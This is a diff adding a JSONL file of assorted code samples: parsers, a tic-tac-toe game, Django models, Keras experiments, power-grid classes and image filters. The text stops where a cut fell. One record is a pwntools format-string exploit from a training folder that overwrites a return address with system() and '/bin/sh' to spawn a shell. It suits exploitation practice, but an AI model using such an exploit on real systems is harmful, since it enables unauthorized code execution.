diff --git "a/4450.jsonl" "b/4450.jsonl" new file mode 100644--- /dev/null +++ "b/4450.jsonl" @@ -0,0 +1,681 @@ +{"seq_id":"154717964","text":"import json\nfrom stream_parser.pubmed_row_parser import PubmedRowParser\n\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass Processor:\n\n def parse_pubmed(self, json_str):\n \"\"\"\n curl --header \"Content-Type: application/json\" \\\n --request POST \\\n --data '{ \"path\": \"pubmed_baseline/pubmed19n0971.xml.gz\", \"limit\": 10 }' \\\n http://localhost:5000/parse_pubmed\n\n 1. read json, get obs path\n 2. use read_obs_line to read gz stream\n 3. parse stream to pubmed parser\n\n :return:\n \"\"\"\n\n self.pr_parser = PubmedRowParser()\n\n error_return = [\"[ERROR]json decode error\"]\n # decode json\n try:\n request = json.loads(json_str)\n except json.decoder.JSONDecodeError as e:\n logging.info(\"parsing: {}\".format(json_str))\n logging.info(\"ERROR: {}\".format(e))\n yield error_return\n return\n\n # get value from dict by key\n try:\n pubmed_path = request['path']\n # ak = request['ak']\n # sk = request['sk']\n except KeyError as e:\n logging.info(\"ERROR: key:{} not found\".format(e))\n yield error_return\n return\n\n #callback = request.get_json().get('callback')\n size_limit = request.get('limit', -1)\n\n try:\n pubmed_rows = self.pr_parser.parse(pubmed_path)\n except Exception as e:\n logging.info(\"ERROR: \\n{}: {}\".format(e.__class__, e))\n yield error_return\n return\n\n if size_limit > 0:\n for pubmed_row in pubmed_rows[:size_limit]:\n pubmed_row[\"raw_gz\"] = pubmed_path\n yield json.dumps(pubmed_row)\n else:\n for pubmed_row in pubmed_rows:\n pubmed_row[\"raw_gz\"] = pubmed_path\n yield json.dumps(pubmed_row)\n\n","sub_path":"stream_parser/request_processor.py","file_name":"request_processor.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"89086134","text":"import getWinner\nimport getAuthors\nimport getComments\nimport dupeCmtCheck\nimport removeInvalids\nimport sys\nimport importlib.util\n\nif sys.version_info < (3, 5):\n x = input(\"Please use Python 3.5 or above. Enter Y to ignore. \").upper()\n if x != \"Y\":\n exit(1)\n\n\nif importlib.util.find_spec('praw') is None:\n x = input(\"The PRAW package is required but not installed.\\nPlease run 'pip install praw' in your terminal.\\nEnd..\")\n exit(2)\n\n\nwhile True:\n x = int(input(\"\\nHello!\\nWhat would you like to launch?\\n0. Exit\\n1. getComments\\n2. getAuthors\\n3. removeInvalids\\n4. getWinner\\n5. dupeCmtCheck\\n\\nOption: \"))\n\n parts = {\n 1: getComments,\n 2: getAuthors,\n 3: removeInvalids,\n 4: getWinner,\n 5: dupeCmtCheck,\n }\n\n if x == 0:\n print(\"Goodbye\")\n exit(0)\n\n parts.get(x).main()\n","sub_path":"2020 Feb~Oct Draws/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"298790263","text":"\nfrom ezprint import *\nfrom ctypes import *\nimport random\nimport time\nimport os\n\n\npole = [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ']\nnotification = ''\nwidth = 50\ntitle = 'Tic Tac Toe'\n\nfield_strs = []\n\n\nclass COORD(Structure):\n\tpass\nCOORD._fields_ = [(\"X\", c_short), (\"Y\", c_short)]\ndef print_at(r, c, s):\n\th = windll.kernel32.GetStdHandle(-11)\n\twindll.kernel32.SetConsoleCursorPosition(h, COORD(c, r))\n\tc = s.encode(\"windows-1252\")\n\twindll.kernel32.WriteConsoleA(h, c_char_p(c), len(c), None, None)\n\n\ndef cls():\n\tos.system('cls')\n\n\ndef print_window():\n\tmake_pole()\n\tcls()\n\tfor s in field_strs:\n\t\tprint(s)\n\n\ndef make_pole():\n\tglobal field_strs\n\tfield_strs = []\n\n\totstup = (width - 13) // 2 - 1\n\n\tfield_strs.append('╔' + title + (width - len(title) - 2) * '═' + '╗')\n\tfield_strs.append('║' + otstup * ' ' + '╔═══╦═══╦═══╗' + (otstup + 1) * ' ' + '║')\n\tfield_strs.append('║' + otstup * ' ' + '║ ' + pole[0] + ' ║ ' + pole[1] + ' ║ ' + pole[2] + ' ║ ' + (otstup) * ' ' + '║')\n\tfield_strs.append('║' + otstup * ' ' + '╠═══╬═══╬═══╣' + (otstup + 1) * ' ' + '║')\n\tfield_strs.append('║' + otstup * ' ' + '║ ' + pole[3] + ' ║ ' + pole[4] + ' ║ ' + pole[5] + ' ║' + (otstup + 1) * ' ' + '║')\n\tfield_strs.append('║' + otstup * ' ' + '╠═══╬═══╬═══╣'+ (otstup + 1) * ' ' + '║' )\n\tfield_strs.append('║' + otstup * ' ' + '║ ' + pole[6] + ' ║ ' + pole[7] + ' ║ ' + pole[8] + ' ║' + (otstup + 1) * ' ' + '║')\n\tfield_strs.append('║' + otstup * ' ' + '╚═══╩═══╩═══╝' + (otstup + 1) * ' ' + '║')\n\tfield_strs.append('║' + (width - 2) * ' ' + '║')\n\n\ndef check_pole():\n\tglobal notification\n\tif pole[2] == 'X' and pole[4] == 'X' and pole[6] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[2] == 'O' and pole[4] == 'O' and pole[6] == 'O':\n\t\tnotification = 'O WON!'\n\n\tif pole[0] == 'X' and pole[4] == 'X' and pole[8] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[0] == 'O' and pole[4] == 'O' and pole[8] == 'O':\n\t\tnotification = 'O WON!'\n\n\tif pole[0] == 'X' and pole[3] == 'X' and pole[6] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[0] == 'O' and pole[3] == 'O' and pole[6] == 'O':\n\t\tnotification = 'O WON!'\n\n\tif pole[1] == 'X' and pole[4] == 'X' and pole[7] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[1] == 'O' and pole[4] == 'O' and pole[7] == 'O':\n\t\tnotification = 'O WON!'\n\n\tif pole[2] == 'X' and pole[5] == 'X' and pole[8] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[2] == 'O' and pole[5] == 'O' and pole[8] == 'O':\n\t\tnotification = 'O WON!'\n\n\tif pole[0] == 'X' and pole[1] == 'X' and pole[2] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[0] == 'O' and pole[1] == 'O' and pole[2] == 'O':\n\t\tnotification = 'O WON!'\n\n\tif pole[3] == 'X' and pole[4] == 'X' and pole[5] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[3] == 'O' and pole[4] == 'O' and pole[5] == 'O':\n\t\tnotification = 'O WON!'\n\n\tif pole[6] == 'X' and pole[7] == 'X' and pole[8] == 'X':\n\t\tnotification = 'X WON!'\n\tif pole[6] == 'O' and pole[7] == 'O' and pole[8] == 'O':\n\t\tnotification = 'O WON!'\n\n\ndef main():\n\tglobal notification\n\n\t\n\twhile True:\n\t\tprint_window()\n\n\t\tif notification == 'This cell is not empty':\n\t\t\tprint('║ This cell is not empty ║')\n\t\telif notification == '':\n\t\t\tprint('║ ║')\n\t\telif notification == 'X WON!' or notification == 'O WON!':\n\t\t\tprint('║ ║')\n\t\t\tprint('║' + ' ' * 21 + notification + ' ' * 21 + '║')\n\t\t\tprint('║ ║')\n\t\t\tprint('╚════════════════════════════════════════════════╝')\n\t\t\ttime.sleep(1)\n\t\t\tmenu()\n\n\t\tprint('║ Input number of cell: ║')\n\n\t\tprint('║ ║')\n\t\tprint('╚════════════════════════════════════════════════╝')\n\t\tprint_at(10 ,36, '')\n\n\t\tnotification = ''\n\n\t\tk = int(input('')) - 1\n\n\t\tif pole[k] == ' ':\n\t\t\tpole[k] = 'X'\n\n\t\t\tfo = random.randrange(0, 8)\n\t\t\t\n\t\t\twhile pole[fo] != ' ':\n\t\t\t\tif pole[0] != ' ' and pole[1] != ' ' and pole[2] != ' ' and pole[3] != ' ' and pole[5] != ' ' and pole[6] != ' ' and pole[7] != ' ' and pole[8] != ' ':\n\t\t\t\t\tbreak\n\t\t\t\tfo = random.randrange(0, 8)\n\t\t\t\n\t\t\tpole[fo] = 'O'\n\t\t\tcheck_pole()\n\t\t\tprint_window()\n\t\telse:\n\t\t\tnotification = 'This cell is not empty'\n\n\ndef menu():\n\tos.system('@echo off')\n\tos.system('mode con:cols=' + str(width + 1) + ' lines=15')\n\tcls()\n\tp(pwi('===TIC-TAC-TOE==='))\n\tp(pwi('=====1-START====='))\n\tp(pwi('=====2-EXIT======'))\n\tvi = input(pwi('>>>'))\n\tif vi == '1':\n\t\tmain()\n\tif vi == '2':\n\t\texit()\n\nif __name__ == '__main__':\n\tmenu()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"248815599","text":"# urlcaller.py\nimport logging\nimport sys\nimport requests\n\nlogger = logging.getLogger(__name__)\n\ntry:\n response = requests.get(sys.argv[1])\nexcept requests.exceptions.ConnectionError as e:\n logger.exception()\n print(-1, 'Connection Error')\nelse:\n print(response.status_code, response.content)\n","sub_path":"urlcaller.py","file_name":"urlcaller.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"376934968","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2018/12/14 15:38\n@author: Sucre\n@email: qian.dong.2018@gmail.com\n\"\"\"\n\n\nclass Solution:\n def letterCombinations(self, digits):\n \"\"\"\n :type digits: str\n :rtype: List[str]\n \"\"\"\n s=\"abcdefghijklmnopqrstuvwxyz\"\n dtos = {}\n if digits==\"\":\n return []\n for i in range(5):\n dtos[i + 2] = s[i * 3:i * 3 + 3]\n dtos[7] = 'pqrs'\n dtos[8] = 'tuv'\n dtos[9] = 'wxyz'\n res = []\n for d in digits:\n res.append(dtos[int(d)])\n def dp(i):#res[i:]的组合\n result = []\n if i == len(res):\n return ['']\n chars = res[i]\n for c in chars:\n chars_next = dp(i+1)\n for cn in chars_next:\n result.append(c+cn)\n return result\n return dp(0)\n\n\n","sub_path":"_017_Letter_Combinations_of_a_Phone_Number.py","file_name":"_017_Letter_Combinations_of_a_Phone_Number.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"30722858","text":"from keras.models import Sequential\nfrom keras.layers import Dense, Activation\nimport numpy as np\nimport random\nfrom math import ceil\nimport time\nimport sys\nimport keras\n\n#Dimension of layers\ndim = 8\n\n#Generate dataset\nX = []\nfor i in range(0,2**dim):\n n = [float(x) for x in bin(i)[2:]]\n X.append([0.]*(dim-len(n))+n)\ny = X[:]\nrandom.shuffle(y)\nX = np.array(X)\ny = np.array(y)\n\n# create model\nmodel = Sequential()\nmodel.add(Dense(dim, input_dim=dim, init='normal'))\nmodel.add(Activation('sigmoid'))\nmodel.add(Dense(dim, init='normal'))\nmodel.add(Activation('sigmoid'))\nmodel.add(Dense(dim, init='normal'))\nmodel.add(Activation('sigmoid'))\n\nstart_time = time.clock()\n# Compile model\nmodel.compile(loss='mse', optimizer='SGD', metrics=['accuracy'])\n# Fit the model\nmodel.fit(X, y, nb_epoch=1000, batch_size=50, verbose=1,\n callbacks= [\n#keras.callbacks.TerminateOnNaN()\n#keras.callbacks.EarlyStopping(monitor='loss', patience=1)\n#keras.callbacks.EarlyStopping(monitor='accuracy', patience=1)\nkeras.callbacks.DeepLocalize(X, y, len(model.layers), batch_size=50, startTime = start_time)\n]\n )\n# evaluate the model\nscores = model.evaluate(X, y)\nprint(\"%s: %.2f%%\" % (model.metrics_names[1], scores[1]*100))\noutput = model.predict(X)\nend_time = time.clock()\n\n\n#Make the output binary\nfor i in range(0, output[:,0].size):\n for j in range(0, output[0].size):\n if output[i][j] > 0.5 or output[i][j] == 0.5:\n output[i][j] = 1\n else:\n output[i][j] = 0\nprint(output)\nprint(\"Time\", (end_time -start_time))\nsys.exit(1)","sub_path":"Benchmark/StackOverflow/39217567/Buggy Code/39217567.py","file_name":"39217567.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"310266054","text":"from django.db import models\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes.fields import GenericForeignKey\nfrom django.contrib.auth.models import User\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass Note(models.Model):\n title = models.CharField(verbose_name=_('Title'), max_length=32)\n body = models.TextField(verbose_name=_('Body'))\n creation_datetime = models.DateTimeField(verbose_name=_('Creation datetime'), auto_now_add=True)\n author = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n\n def __str__(self):\n return self.title\n\n class Meta:\n ordering = ['creation_datetime']\n\n\nclass NoteItem(models.Model):\n note = models.ForeignKey('Note', on_delete=models.CASCADE)\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n def __str__(self):\n return self.note\n\n class Meta:\n ordering = ['-note']\n","sub_path":"ingredient_order_site/notes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"624224379","text":"# Copyright (C) 2010-2011 Richard Lincoln\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n\nfrom CIM14.IEC61970.Core.EquipmentContainer import EquipmentContainer\n\nclass VoltageLevel(EquipmentContainer):\n \"\"\"A collection of equipment at one common system voltage forming a switchgear. The equipment typically consist of breakers, busbars, instrumentation, control, regulation and protection devices as well as assemblies of all these.\n \"\"\"\n\n def __init__(self, highVoltageLimit=0.0, lowVoltageLimit=0.0, Substation=None, MemberOf_Substation=None, Bays=None, BaseVoltage=None, *args, **kw_args):\n \"\"\"Initialises a new 'VoltageLevel' instance.\n\n @param highVoltageLimit: The bus bar's high voltage limit \n @param lowVoltageLimit: The bus bar's low voltage limit \n @param Substation: The association is used in the naming hierarchy.\n @param MemberOf_Substation: Alias for Substation\n @param Bays: The association is used in the naming hierarchy.\n @param BaseVoltage: The base voltage used for all equipment within the VoltageLevel.\n \"\"\"\n #: The bus bar's high voltage limit\n self.highVoltageLimit = highVoltageLimit\n\n #: The bus bar's low voltage limit\n self.lowVoltageLimit = lowVoltageLimit\n\n self._Substation = None\n self.Substation = Substation\n if MemberOf_Substation != None:\n self.Substation = MemberOf_Substation\n\n self._Bays = []\n self.Bays = [] if Bays is None else Bays\n\n self._BaseVoltage = None\n self.BaseVoltage = BaseVoltage\n\n super(VoltageLevel, self).__init__(*args, **kw_args)\n\n _attrs = [\"highVoltageLimit\", \"lowVoltageLimit\"]\n _attr_types = {\"highVoltageLimit\": float, \"lowVoltageLimit\": float}\n _defaults = {\"highVoltageLimit\": 0.0, \"lowVoltageLimit\": 0.0}\n _enums = {}\n _refs = [\"Substation\", \"MemberOf_Substation\", \"Bays\", \"BaseVoltage\"]\n _many_refs = [\"Bays\"]\n\n def getSubstation(self):\n \"\"\"The association is used in the naming hierarchy.\n \"\"\"\n return self._Substation\n\n def setSubstation(self, value):\n if self._Substation is not None:\n filtered = [x for x in self.Substation.VoltageLevels if x != self]\n self._Substation._VoltageLevels = filtered\n\n self._Substation = value\n if self._Substation is not None:\n if self not in self._Substation._VoltageLevels:\n self._Substation._VoltageLevels.append(self)\n\n Substation = property(getSubstation, setSubstation)\n MemberOf_Substation = property(getSubstation, setSubstation)\n\n def getBays(self):\n \"\"\"The association is used in the naming hierarchy.\n \"\"\"\n return self._Bays\n\n def setBays(self, value):\n for x in self._Bays:\n x.VoltageLevel = None\n for y in value:\n y._VoltageLevel = self\n self._Bays = value\n\n Bays = property(getBays, setBays)\n\n def addBays(self, *Bays):\n for obj in Bays:\n obj.VoltageLevel = self\n\n def removeBays(self, *Bays):\n for obj in Bays:\n obj.VoltageLevel = None\n\n def getBaseVoltage(self):\n \"\"\"The base voltage used for all equipment within the VoltageLevel.\n \"\"\"\n return self._BaseVoltage\n\n def setBaseVoltage(self, value):\n if self._BaseVoltage is not None:\n filtered = [x for x in self.BaseVoltage.VoltageLevel if x != self]\n self._BaseVoltage._VoltageLevel = filtered\n\n self._BaseVoltage = value\n if self._BaseVoltage is not None:\n if self not in self._BaseVoltage._VoltageLevel:\n self._BaseVoltage._VoltageLevel.append(self)\n\n BaseVoltage = property(getBaseVoltage, setBaseVoltage)\n\n","sub_path":"CIM14/IEC61970/Core/VoltageLevel.py","file_name":"VoltageLevel.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"66834625","text":"#!/usr/bin/env python\r\n\r\nfrom pwn import *\r\nr = process(\"./formatstring\")\r\nraw_input('Debug?')\r\n\r\ndef bin_sh():\r\n\tsystem = 0xf7e3dda0 \r\n\tsystem_low = system & 0xffff\r\n\tsystem_high = (system & 0xffff0000) >> 16\r\n\r\n\tstring_bin_sh = 0xf7f5ea0b \r\n\tstring_bin_sh_low = string_bin_sh & 0xffff\r\n\tstring_bin_sh_high = (string_bin_sh & 0xffff0000) >> 16\r\n\r\n\tret_main = 0xffffd5dc\r\n\t\r\n\tpayload = p32(ret_main)\r\n\tpayload += p32(ret_main+2)\r\n\tpayload += p32(ret_main+8)\r\n\tpayload += p32(ret_main+10)\r\n\tpayload += \"%\" + str(system_low - 16) + \"x%6$hn\"\r\n\tpayload += \"%\" + str(0x10000 + system_high - system_low) + \"x%7$hn\"\r\n\tpayload += \"%\" + str(0x10000 + string_bin_sh_low - system_high)+ \"x%8$hn\"\r\n\tpayload += \"%\" + str(string_bin_sh_high - string_bin_sh_low)+ \"x%9$hn\"\r\n\t\r\n\treturn payload\r\n\r\n\r\nr.sendline(bin_sh())\r\nr.interactive()","sub_path":"pwntraining/format/formatstring.py","file_name":"formatstring.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"339826903","text":"# -*- coding: utf-8 -*-\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Conv2D, Dropout, Flatten, MaxPooling2D\r\nimport cv2 as cv\r\n\r\n(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()\r\n\r\nx_train = x_train.reshape(x_train.shape[0], 28, 28, 1)\r\nx_test = x_test.reshape(x_test.shape[0], 28, 28, 1)\r\ninput_shape = (28, 28, 1)\r\nx_train = x_train.astype('float32')\r\nx_test = x_test.astype('float32')\r\n# Normalizing the RGB codes by dividing it to the max RGB value.\r\nx_train /= 255\r\nx_test /= 255\r\n\r\n\r\n#-----------------------------------------Training Starts-------------------------------------\r\n\r\nmodel = tf.keras.models.Sequential()#Feed foeward \r\nmodel.add(tf.keras.layers.Flatten())#input layer\r\nmodel.add(tf.keras.layers.Dense(128,activation = tf.nn.relu))#hidden\r\nmodel.add(tf.keras.layers.Dense(128,activation = tf.nn.relu))#hidden\r\nmodel.add(tf.keras.layers.Dense(10,activation = tf.nn.softmax))#Output classification for 10 digit \r\n\r\nmodel.compile(optimizer = 'adam',loss = 'sparse_categorical_crossentropy',metrics= ['accuracy'])\r\nmodel.fit(x_train,y_train, epochs = 3)\r\n\r\n#-----------------------------------------Training Ends-------------------------------------\r\n\r\nmodel.save('num_rec_model1.model')\r\nnew_model = tf.keras.models.load_model('C:/Users/NSahoo/.spyder-py3/num_rec_model1.model')\r\n\r\nfile = \"C:/Users/NSahoo/.spyder-py3/1.jpg\"\r\nnew_model.evaluate(x_test, y_test)\r\n\r\n\r\nimage = cv.imread(file, cv.IMREAD_GRAYSCALE)\r\nimage = cv.resize(image, (28, 28))\r\nimage = image.astype('float32')\r\nimage = image.reshape(1, 28, 28, 1)\r\nimage = 255-image\r\nimage /= 255\r\n\r\n\r\nplt.imshow(image.reshape(28, 28),cmap='Greys')\r\nplt.show()\r\npred = new_model.predict(image.reshape(1, 28, 28, 1), batch_size=1)\r\nprint(pred.argmax())","sub_path":"DigiRecog_Own_image_test.py","file_name":"DigiRecog_Own_image_test.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"454284727","text":"# WARNING\n# THIS IS A SCRIPT DESIGNED To QUICKLY CLEAR ALL THE FILES IN THE MEDIA FOLDER\n# THIS FILE SHOULD NOT BE RELEASED IN THE FINAL BUILD OF THE WEBSITE\n\nimport os\nfrom os import walk\nfrom olivesProject.settings import MEDIA_DIR\n\n\ndef clear():\n\n for dirpath, subdirs, files in walk(MEDIA_DIR):\n for file in files:\n print(\"Deleting file: \" + os.path.join(dirpath, file))\n os.remove(os.path.join(dirpath, file))\n\n\nif __name__ == \"__main__\":\n confirm = input(\"WARNING THIS WILL CLEAR ALL FILES IN THE MEDIA DIR. ENTER y TO CONTINUE: \")\n if confirm == \"y\":\n print(\"CONFIRMATION ACKNOWLEDGED DELETING ALL MEDIA FILES !\")\n clear()\n","sub_path":"clear_media.py","file_name":"clear_media.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"75906761","text":"\nfrom operator import itemgetter\n\ncities = [\n ('Poznan', 500000), \n ('Berlin', 3200000), \n ('Heidelberg', 50000), \n ('London',9000000), \n ('Dublin', 506000), \n ('Warsaw', 1700000)\n ]\n \n \ndef print_cities(c):\n \"\"\"Prints cities nicely.\"\"\"\n for i, citydata in enumerate(c):\n name, population = citydata\n print(\"%3i. %-15s\\t%10i\"%(i+1, name, population))\n \n\nprint('\\nunsorted:')\nprint_cities(cities)\n\nprint('\\nsorted by name:')\ncities.sort()\nprint_cities(cities)\n\nprint('\\nsorted by population size:')\ncities = sorted(cities, key=itemgetter(1))\nprint_cities(cities)\n\n","sub_path":"example_programs/data_structures/sorting/sort_by_column.py","file_name":"sort_by_column.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"176710463","text":"import pandas, numpy\r\nfrom scipy import spatial\r\nfrom utils import mongoUtils, configReader, dimentionalityUtils\r\n\r\nclass allVDLocations:\r\n def __init__(self, method, location_id, latent_semantics):\r\n '''\r\n Constructor method for the class\r\n :param method: Method for demensionality reductions\r\n :param location_id: Query location ID\r\n '''\r\n self.method = method\r\n self.location_id = location_id\r\n self.latent_semantics = latent_semantics\r\n\r\n def getLocationName(self):\r\n '''\r\n Returns location name respective to entered location ID\r\n :return:\r\n Location name\r\n '''\r\n config = configReader()\r\n mu = mongoUtils(config.mongo_hostname, config.mongo_database,\r\n config.location_info_collection)\r\n client = mu.get_mongodb_client()\r\n collection = mu.get_mongodb_collection(client)\r\n location_name = collection.distinct(\"title\",\r\n {\"number\": int(self.location_id)})\r\n client.close()\r\n return location_name[0]\r\n\r\n def getLocationList(self):\r\n config = configReader()\r\n mu = mongoUtils(config.mongo_hostname, config.mongo_database,\r\n config.location_vd_collection)\r\n client = mu.get_mongodb_client()\r\n collection = mu.get_mongodb_collection(client)\r\n results = collection.aggregate([{\"$match\": {}},\r\n {\"$project\": {\r\n \"location\": \"$location\",\r\n }}])\r\n data = pandas.DataFrame(list(results))\r\n return data['location']\r\n\r\n\r\n def getDataFrame(self, image, image_score):\r\n '''\r\n Returns pandas dataframe for images and their visual discriptor model\r\n :param image: List of Image IDs\r\n :param image_score: List of visual descriptor score\r\n :return:\r\n Pandas dataframe\r\n '''\r\n image_score = numpy.array(image_score).reshape(len(image_score),\r\n len(image_score[0]))\r\n return pandas.DataFrame(image_score, columns=range(len(image_score[0])),\r\n index=image)\r\n\r\n def getQueryLocationData(self, location_name, vector_model):\r\n '''\r\n Get visual descriptor data for given location\r\n :return:\r\n Matrix of image scores for selected visual model of given location\r\n '''\r\n config = configReader()\r\n mu = mongoUtils(config.mongo_hostname, config.mongo_database,\r\n config.location_vd_collection)\r\n client = mu.get_mongodb_client()\r\n collection = mu.get_mongodb_collection(client)\r\n result = collection.aggregate([{\"$match\": {\"location\": location_name}},\r\n {\"$project\": {\r\n \"_id\": \"$_id\",\r\n \"location\": \"$location\",\r\n \"images\": \"$\" + vector_model + \".image\",\r\n \"scores\": \"$\" + vector_model + \".scores\"\r\n }}])\r\n data = pandas.DataFrame(list(result))\r\n client.close()\r\n query_image_list = data['images']\r\n query_scores_list = data['scores']\r\n image_score_matrix = pandas.DataFrame()\r\n for index in range(len(query_image_list)):\r\n image_score_matrix = image_score_matrix.append(\r\n self.getDataFrame(query_image_list[index], query_scores_list[index]))\r\n return image_score_matrix, query_image_list\r\n\r\n def getSimilarLocations(self):\r\n model_similarity = {}\r\n cos_location = []\r\n store = {}\r\n mat = {}\r\n location_name = self.getLocationName()\r\n model = ['CM', 'CN', 'CM3x3', 'CN3x3', 'CSD', 'GLRLM', 'GLRLM3x3', 'HOG', 'LBP', 'LBP3x3']\r\n all_location_list = self.getLocationList()\r\n for i in model:\r\n image_score_matrix, query_image_list = self.getQueryLocationData(location_name, i)\r\n du = dimentionalityUtils(self.method, image_score_matrix, self.latent_semantics)\r\n u, s, vt = du.apply_transformation()\r\n new_feature_mat = image_score_matrix.dot(vt.T)\r\n for n in range(len(vt)):\r\n print(\"\\nLatent Semantics\", n + 1, \"using Choice\", self.method, \"for Model\", i, \"are: \",\r\n end=\":\") # Displaying the Latent Semantics of Query location\r\n for score_index in range(len(vt[n])):\r\n if score_index == len(vt[n]) - 1:\r\n print(vt[n][score_index])\r\n else:\r\n print(vt[n][score_index], end=',')\r\n print()\r\n store[i] = vt\r\n mat[i] = new_feature_mat # Storing the new feature matrix and all models score for further computation\r\n for r in range(len(all_location_list)):\r\n for i in model:\r\n other_image_score_matrix, image_list = self.getQueryLocationData(all_location_list[r], i)\r\n related_location_scores = numpy.matmul(other_image_score_matrix, numpy.transpose(\r\n store[i])) # generating Images of the location x Latent Semantics matrix\r\n location_scores_df = pandas.DataFrame(related_location_scores, index=other_image_score_matrix.axes[0])\r\n location_scores_df = location_scores_df[~location_scores_df.index.duplicated(keep='first')]\r\n cos = []\r\n mat[i]\r\n for e in image_list[0]:\r\n current_image = list(location_scores_df.loc[e].values)\r\n for j in mat[i].values:\r\n cos.append(spatial.distance.euclidean(current_image, j.tolist())) # Euclidean Distance Calculation\r\n cos_location.append(numpy.mean(cos))\r\n model_similarity[all_location_list[r]] = numpy.mean(cos_location)\r\n count = 0\r\n print(\"Most similar 5 locations are:\")\r\n for location in sorted(model_similarity, key=model_similarity.get):\r\n print(\"Location\", location, \"with similarity score\",\r\n model_similarity[location])\r\n count += 1\r\n if count == 5:\r\n break\r\n","sub_path":"Phase 2/allVDLocations.py","file_name":"allVDLocations.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"46130927","text":"import numpy as np\r\nimport random\r\nimport cv2\r\nimport math\r\n\r\n#-----------------------------------------------------------\r\n#Funcion para ruido de sal y pimienta\r\ndef sp_noise(image,prob):\r\n '''\r\n Add salt and pepper noise to image\r\n prob: Probability of the noise\r\n '''\r\n\r\n output = np.zeros(image.shape,np.uint8)\r\n thres = 1 - prob\r\n for i in range(image.shape[0]):\r\n for j in range(image.shape[1]):\r\n rdn = random.random()\r\n if rdn < prob:\r\n output[i][j] = 0\r\n elif rdn > thres:\r\n output[i][j] = 255\r\n else:\r\n output[i][j] = image[i][j]\r\n return output\r\n#Funcion para generar ruido gaussiano\r\ndef gauss_noise(image):\r\n noisy_image = np.zeros(image.shape,np.uint8)\r\n row = image.shape[0]\r\n col = image.shape[1]\r\n gaussian_noise = np.zeros((row,col),dtype=np.uint8)\r\n noiseg = cv2.randn(gaussian_noise, 100, 150)\r\n gaussian = (noiseg*0.5).astype(np.uint8)\r\n noisy_image = cv2.add(image,gaussian)\r\n return noisy_image\r\n\r\n#-----------------------------------------------------------------\r\n#Funciones: Filtro para imagen con ruido de sal y pimienta\r\n\r\ndef fill_kernel(kernel_mid_x, kernel_mid_y, kernel_size, image):\r\n\r\n kernel = np.zeros((kernel_size[0], kernel_size[1]), dtype = int)\r\n from_x = kernel_mid_x - int(math.floor(kernel_size[1]/2))\r\n to_x = kernel_mid_x + int(math.floor(kernel_size[1]/2))\r\n from_y = kernel_mid_y - int(math.floor(kernel_size[0]/2))\r\n to_y = kernel_mid_y + int(math.floor(kernel_size[0]/2))\r\n\r\n for i in range(from_x, to_x + 1):\r\n for j in range(from_y, to_y + 1):\r\n\r\n kernel[i - 